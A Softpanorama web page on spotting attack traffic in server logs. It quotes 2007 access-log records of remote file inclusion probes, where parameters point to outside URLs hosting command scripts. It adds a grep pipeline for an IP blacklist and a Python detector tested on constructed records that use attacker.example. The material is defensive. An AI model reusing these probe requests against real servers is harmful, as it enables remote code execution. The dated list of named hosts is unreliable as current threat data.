Softpanorama
May the source be with you, but remember the KISS principle ;-)
Recently the number of "strange" access records in the web logs jumped, and it became interesting to analyze the logs and see what those people are doing. Here is one fragment that I found manually:
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/%3Elanguage.shtml/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 383 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:08 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 364 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:12 -0700] "GET /Scripting/Phprama/%3Cwbr%20/%3Ecommand_line_php.shtml/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 393 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /Scripting/Phprama/%3Cwbr%20/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 366 "-" "libwww-perl/5.79"
66.230.197.170 - - [23/Jun/2007:06:25:53 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.805"
24.117.228.198 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://dezzign.ru/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"
One thing those records have in common is the user agent libwww-perl. Grepping on this string gives a more complete picture, reproduced in the Zombies bulletin.
Extracting the IP addresses gives you a first draft of a "blacklist", and the top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe, which can be made into a function or a shell script:
# usage: dirty_dozen.sh access_log   (writes the 12 most active libwww-perl sources to access_log.dirty)
grep 'libwww.perl' "$1" | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > "$1.dirty"
Below are the results of processing the list from above (request count, address, host name):
20 83.149.125.174 home.w-sieci.pl
18 80.67.20.21 mayermail.de
12 200.69.222.122 contactar01.gestionarnet.com
11 64.78.163.2 nickentgolf.com
11 62.193.224.166 wpc0230.amenworld.com
10 86.109.161.201 lincl239.ns1.couldix.com
9 87.230.2.113 lvps87-230-2-113.dedicated.hosteurope.de
9 85.214.55.73 mind-creations.net
7 193.192.249.157
6 87.118.96.254 ns.km22206-02.keymachine.de
6 72.55.153.108 ip-72-55-153-108.static.privatedns.com
6 66.147.239.104 host.1sbs.com
6 216.246.52.59 server.dynasoft.com.ph
6 213.195.77.225 225.77.195.213.ibercom.com
5 217.115.197.51 node11.cluster.nxs.nl
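The pipe above keys the blacklist on the user agent alone. The following Python script is an added example (not from the original page) that parses the same combined-format records, adds the second indicator visible in the excerpt (an absolute URL handed over as a query value, the signature of a remote-include probe), and produces the same per-address count with the reasons attached. The log records are constructed and use documentation addresses; the log format is assumed to match the excerpt.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format, as in the page's excerpt (assumed; adjust if your LogFormat differs).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# An absolute URL passed as a query value is what the str.php / load_lang.php probes above have in common.
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.I)

# Constructed sample records modelled on the page's excerpt; IPs and hosts are documentation placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://attacker.example/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
203.0.113.7 - - [23/Jun/2007:06:08:13 -0700] "GET /Scripting/%3Cwbr%20/str.php?l=http://attacker.example/cmd.txt? HTTP/1.1" 406 366 "-" "libwww-perl/5.79"
198.51.100.9 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://other.example/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"
192.0.2.44 - - [23/Jun/2007:07:00:00 -0700] "GET /index.shtml HTTP/1.1" 200 5120 "http://www.example.org/" "Mozilla/5.0"
192.0.2.44 - - [23/Jun/2007:07:00:01 -0700] "GET /search.php?q=http%3A%2F%2Fwww.example.org%2F HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def parse_record(line):
    """Split one combined-format line into its fields, or return None for a malformed line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(rec):
    """Return the set of indicators a parsed record matches (empty set = looks benign)."""
    reasons = set()
    if 'libwww-perl' in rec['ua'].lower():      # the page's own criterion
        reasons.add('libwww-perl')
    # parse_qsl percent-decodes values, so an encoded http%3A%2F%2F... is caught as well.
    query = urlsplit(rec['target']).query
    if any(REMOTE_URL.match(v) for _, v in parse_qsl(query, keep_blank_values=True)):
        reasons.add('remote-url-param')
    return reasons

def dirty_dozen(log_text, top=12):
    """Per source IP: number of flagged requests and the indicators seen, busiest first."""
    hits, why = Counter(), {}
    for rec in filter(None, map(parse_record, log_text.splitlines())):
        reasons = classify(rec)
        if reasons:
            hits[rec['ip']] += 1
            why.setdefault(rec['ip'], set()).update(reasons)
    return [(ip, n, sorted(why[ip])) for ip, n in hits.most_common(top)]

if __name__ == '__main__':
    for ip, n, reasons in dirty_dozen(SAMPLE_LOG):
        print(f'{n:4d} {ip:16s} {",".join(reasons)}')
```

Note that 192.0.2.44 appears only because of the URL-in-parameter rule (a legitimate search with a URL as its term), which is why a single indicator should be treated as a lead to inspect rather than grounds for a block; addresses matching both are the ones worth the "dirty dozen".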
Scanning attempts for November, 2009